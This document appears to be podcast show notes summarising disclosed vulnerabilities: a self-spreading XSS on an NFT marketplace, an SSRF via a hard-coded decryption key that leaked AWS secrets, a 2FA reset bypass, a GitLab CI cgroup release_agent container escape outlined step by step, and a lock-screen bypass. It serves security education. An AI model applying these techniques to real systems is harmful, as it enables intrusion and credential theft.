Show Notes

XSS for NFTs, a VMWare Workspace ONE UEM SSRF, and GitLab CI Container Escape

By hiding a cross-site-scripting attack in the profile update functionality, specifically the profile image. Judging from the payload it looks like a straight-forward unescaped input that gets reflected on profile pages, though they did need to contend with Cloudflare’s WAF. As this was on a profile update feature, anyone viewing your profile would then in-turn execute the XSS payload which could upload the payload as their profile picture, worming through the Rarible NFT Marketplace.

In terms of an actual attack beyond the worming an interesting point is raised regarding the web3 browser extensions being accessible from anywhere without cookies. So any XSS payload even running in an empty context could still cause block chain related prompts, like prompting you to sign a transaction. Granted, having a “sign this transaction” prompt on a random page probably would be pretty suspicious but I thought it was an interesting surface to expose.

Hard-coded crednetials strike again, enabled a couple Server Side Request Forgeries as the URL to be requested was inside an encrypted, but user-provided URL parameter. Within the application there were a couple endpoints that would take a Url parameter. The purpose of the endpoints was to serve up cached requests or to make/proxy those requests. So something from the Url parameter was being used to determine the request that should be made.

What was found was a custom encryption/decryption class was being used (DataEncryption.DecryptString(...)) to decrypt the parameter. Which is a huge red-flag when reading code, not rolling your own cryption includes not rolling your own crypto protocols. What they found was that the Url parameter was a base64 encoded string with several colon separated values:


Of note for this vulnerability is the keyVersion field, when set to kv0 it would fall back to using a hard-coded key to decrypt the cipher-text provided. Knowing this one could encrypt their own data using this hard-coded key and have the server make a request to the desired location. They were able to use this to access the metadata instance and leak AWS instance secrets.

To me, this comes across as an inappropriate use of encryption where signing would have made more sense. Granted there may have been reason that the URLs being requested needed to remain secret also inwhich case encryption makes sense. If the goal is to prevent the end-user from being able to craft their own destinations then using public key cryptography

Video Correction: During the discussion on crypto I made a reference to an AED mode of operation, in my ahead i was thinking AEAD (Authenticated Encryption with Associated Data). But this is not an operation mode but just a term of the type of crypto. In my head I was thinking of AES-GCM (Galios Counter Mode). Which uses authentication tags to provide an authenticated cryptosystem.

Probably as easy of a 2FA bypass as I’ve seen, effectively if the account had 2FA the second stage of the password reset form would submit to /reset2fa and if there was no 2FA registered for the account, it would submit to /reset so the attack was just to modify the submission to point to /reset instead of /reset2fa and it wouldn’t prompt for the 2FA token.

Container escape within GitLab CI Runners abusing cgroup’s release_agent functionality as CI jobs are allowed to mount file-systems. The release_agent is a script that will be executed when a cgroup heirachy becomes empty.

So the attacker can mount -t cgroup... (requires a --privileged container) to some mount point, enable notify_on_release and write the path to a release_agent script. That agent script will be executed on the host system. The release_agent technique is fairly well known, and Trail of Bits has done a pretty detailed writeup on it.

The author here didn’t go beyond the container escape, and GitLab has indicated that there is limited impact with the keys they could leak. The Google Cloud Service keys for example only being useful for logging (its unclear if this is still the case as that is from a 2019 report). GitLab closed the report as informational, and is okay with this risk. While its true that on its own this might not be a very useful breakout as it is a container inside a VM. However it is potentially the first stage in a full breakout and in my opinion worth fixing, especially as the author points out there doesn’t appear to be a strong reason for running the container as privileged.

Simple bypass of the (optional) password lock screen by force-killing the application a few times. The exact cause of this is unclear, I have seen something previously where it was a “feature” because the developers thought it was crashing on that point so disabled it to let the user continue to use the application. That doesn’t appear to be the case here thankfully but we don’t get a ton of information on the root cause. it is an interesting test case to keep in mind though, force killing applications can introduce some interesting bugs, often not with security consequences but still worth exploring.

} }